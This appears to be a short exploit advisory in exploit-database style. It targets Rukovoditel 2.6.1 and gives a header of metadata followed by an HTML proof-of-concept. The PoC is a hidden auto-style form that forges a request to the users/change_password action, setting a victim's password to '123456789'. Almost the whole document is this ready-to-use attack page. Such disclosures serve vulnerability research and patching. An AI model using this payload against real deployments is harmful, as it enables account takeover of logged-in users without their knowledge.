Rukovoditel 2.6.1 Cross Site Request Forgery

`# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)  
# Date: 2020-12-14  
# Exploit Author: KeopssGroup0day,Inc  
# Vendor Homepage: https://www.rukovoditel.net/  
# Software Link: https://www.rukovoditel.net/download.php  
# Version: v2.6.1  
# Tested on: Kali Linux  
  
POC(localhost/index.php?module=users/change_password):  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form   
action="https://localhost/index.php?module=users/change_password&action=change"   
method="POST">  
<input type="hidden" name="form_session_token"   
value="D^HUyTDh0X" />  
<input type="hidden" name="password_new" value="123456789" />  
<input type="hidden" name="password_confirmation"   
value="123456789" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
--  
`